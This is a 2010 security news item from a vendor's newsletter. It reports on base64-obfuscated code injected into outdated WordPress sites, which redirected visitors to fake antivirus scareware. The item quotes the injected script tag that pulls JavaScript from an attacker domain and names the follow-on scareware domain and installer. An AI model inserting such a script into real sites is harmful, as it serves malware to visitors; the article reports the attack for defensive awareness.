Explore the latest news and trends  

Sign up for our weekly security newsletter

Be the first to receive important updates on security


New Malicious Code Attacks Target WordPress Websites

Sucuri, an eminent name in providing Web integrity and monitoring solutions, has issued a warning of a new series of malware code injection attacks targeting obsolete WordPress websites, as reported by SOFTPEDIA on July 17, 2010.

Users, who visit these websites, will end up being redirected to web pages that serve FakeAV variant.

Further, the security researchers explained, that these new attacks were the duplicate of those mass compromises that had recently, hit thousands WordPress blogs, on BlueHost, GoDaddy and other organizations. The hackers execute automatic scan procedures to trace the vulnerable installations and thus insert a rouge code in the PHP script.

This malicious code is obfuscated through an encoding function called, base64. The assessment of code gives the output as the elements of a HTML script, which have the content of an external domain.

In such a situation, cyber criminals use "whereisdudescars.com" as the attacking website. Besides, they add the following JavaScript code to the websites: <script src=" http://whereisdudescars.com/js2.php"></script>. This code further loads another JavaScript code from the site http://www4.realprotection36.co.cc, trying to push "Fake Antivirus" virus to the site visitor.

The script can also be used to redirect to other malicious domains possibly from the .co.cc. The domain (co.cc) is in controversy now because of hosting malware loaded websites that manipulate search results through poisoned search results.

This type of criminal activity is very common in the cyber world, whereby the criminals take advantage of the victims by panicking them. Once the victims are panicked, the criminals either persuade them to upload malware to infect their computers or ask them for license fee for the removal of cyber security threat.

In fact, there have been many poisoned search results pointing to a website hosted on .co.cc domains, from where the victims are redirected to other pages similar to YouTube or displaying some fake antivirus scans. In such cases, scareware installer naming PACKUPDATE107_195.EXE is downloaded and detected as Adware/SecurityMasterAV.

According to the security firm "Panda", websites displayed in both the cases have no connection to the search carried out. An image that appears 'My Computer' is displayed with an alert message of infection after the system is completely scanned, reports cjnews on July 16, 2010.

Related article: New Zealand Releases Code To Reduce Spam

ยป SPAMfighter News - 7/29/2010

3 simple steps to update drivers on your Windows PCSlow PC? Optimize your Slow PC with SLOW-PCfighter!Email Cluttered with Spam? Free Spam Filter!

Dear Reader

We are happy to see you are reading our IT Security News.

We do believe, that the foundation for a good work environment starts with fast, secure and high performing computers. If you agree, then you should take a look at our Business Solutions to Spam Filter & Antivirus for even the latest version of Exchange Servers - your colleagues will appreciate it!

Go back to previous page